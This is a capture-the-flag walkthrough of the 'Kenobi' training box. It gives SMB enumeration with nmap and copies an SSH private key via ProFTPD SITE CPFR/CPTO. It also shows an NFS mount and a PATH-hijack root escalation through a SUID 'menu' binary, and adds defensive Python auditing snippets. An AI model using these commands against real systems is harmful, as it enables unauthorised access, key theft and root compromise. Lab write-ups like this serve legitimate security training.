THM-OP-kenbi

Mkd1R 2022-6-11

-nmap

Use the nmap SMB scripts to enumerate shares and users
nmap -p445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.157.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 16:58 CST
Nmap scan report for 10.10.157.56
Host is up (0.28s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.157.56\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.157.56\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.157.56\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
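Added example, not part of the original writeup: a small Python parser for the smb-enum-shares block above that flags shares reachable without credentials, the kind of check to run over scan output before an exposed home-directory share is found by someone else. The sample text is a trimmed copy of the scan output above.

```python
import re

# Constructed sample: a trimmed copy of the smb-enum-shares block above.
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.157.56\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\10.10.157.56\anonymous:
|     Type: STYPE_DISKTREE
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|   \\10.10.157.56\print$:
|     Type: STYPE_DISKTREE
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# "|   \\host\share:" opens a share block; "|     Key: value" is one attribute.
SHARE_RE = re.compile(r"^\|\s{3}\\\\[^\\]+\\(?P<name>[^:]+):\s*$")
ATTR_RE = re.compile(r"^\|\s{5}(?P<key>[^:]+):\s*(?P<value>.*)$")

def parse_shares(text):
    """Map share name -> {attribute: value} from nmap's smb-enum-shares block."""
    shares, current = {}, None
    for line in text.splitlines():
        if line.startswith("|_"):   # nmap marks the block's last line with "|_"
            line = "| " + line[2:]
        m = SHARE_RE.match(line)
        if m:
            current = m.group("name")
            shares[current] = {}
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            shares[current][m.group("key").strip()] = m.group("value").strip()
    return shares

def anonymous_writable(shares):
    """Shares an unauthenticated guest may write to (IPC$ included)."""
    return sorted(n for n, a in shares.items() if "WRITE" in a.get("Anonymous access", ""))

def exposed_disk_shares(shares):
    """Disk shares readable without credentials: these leak files, as /home/kenobi/share did."""
    return sorted(n for n, a in shares.items()
                  if a.get("Type") == "STYPE_DISKTREE" and a.get("Anonymous access", "<none>") != "<none>")
```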

-smbget

Download the share recursively
smbget -R smb://10.10.157.56/anonymous

cat log.txt
[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes
A user directory exists (the share path is under /home/kenobi)

-nc

Try the ProFTPD SITE CPFR and SITE CPTO commands to copy Kenobi's private key

# nc 10.10.157.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.157.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

The /var directory was found while scanning the target host's NFS service, so try mounting it on our machine
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

Change the permissions of the copied id_rsa to 600 and log in over SSH with the key (no password needed)

-Privilege escalation

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

-strings

strings /usr/bin/menu shows the binary calls curl by bare name, so create a fake curl file and prepend its directory to PATH to escalate privileges
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# python -c "import pty;pty.spawn('/bin/bash')"
root@kenobi:/# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
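Added example, not from the writeup: auditing a SUID binary's `strings` output for commands invoked by bare name, and emulating the shell's PATH lookup to show why a planted /tmp/curl wins and why a SUID program that sets its own trusted PATH (or calls absolute paths) is not affected. The strings list and file set are constructed; the exact command lines inside /usr/bin/menu are an assumption.

```python
# Constructed sample of `strings /usr/bin/menu` output. The command lines are an
# assumption modelled on the three menu options above, not the real binary's contents.
MENU_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "system",
    "** Enter your choice :",
    "1. status check",
    "curl -I localhost",   # bare "curl": resolved through the caller's PATH
    "uname -r",
    "ifconfig",
    "/bin/ls -la",         # absolute path: not hijackable via PATH
    "Invalid choice",
]

# Constructed stand-in for the set of names that exist on a trusted PATH; in
# practice build it from the directories listed in SAFE_PATH.
KNOWN_COMMANDS = {"curl", "uname", "ifconfig", "ls", "sh", "bash", "cat"}
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"  # a SUID program should set this itself

def relative_commands(strings_output, known=KNOWN_COMMANDS):
    """Strings that run a known command by bare name: PATH-hijack candidates in a SUID binary."""
    hits = []
    for s in strings_output:
        tokens = s.split()
        if tokens and tokens[0] in known:   # "curl ..." yes, "/bin/ls ..." no
            hits.append(s)
    return hits

def resolve(cmd, path_env, fs):
    """Emulate the shell's PATH search: the first directory holding `cmd` wins."""
    for d in path_env.split(":"):
        candidate = d.rstrip("/") + "/" + cmd
        if candidate in fs:
            return candidate
    return None

# Constructed file set: the planted /tmp/curl beside the real binary.
FS = {"/tmp/curl", "/usr/bin/curl", "/bin/uname", "/sbin/ifconfig"}

if __name__ == "__main__":
    print("bare-name commands:", relative_commands(MENU_STRINGS))
    print("with PATH=/tmp:...:", resolve("curl", "/tmp:" + SAFE_PATH, FS))  # /tmp/curl
    print("with a fixed PATH:", resolve("curl", SAFE_PATH, FS))              # /usr/bin/curl
```

The same audit applies to every entry of the `find / -perm -u=s` list above: any SUID binary whose strings show a bare command name deserves a look at how it builds its environment.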
- THE END -

Last modified: July 2, 2022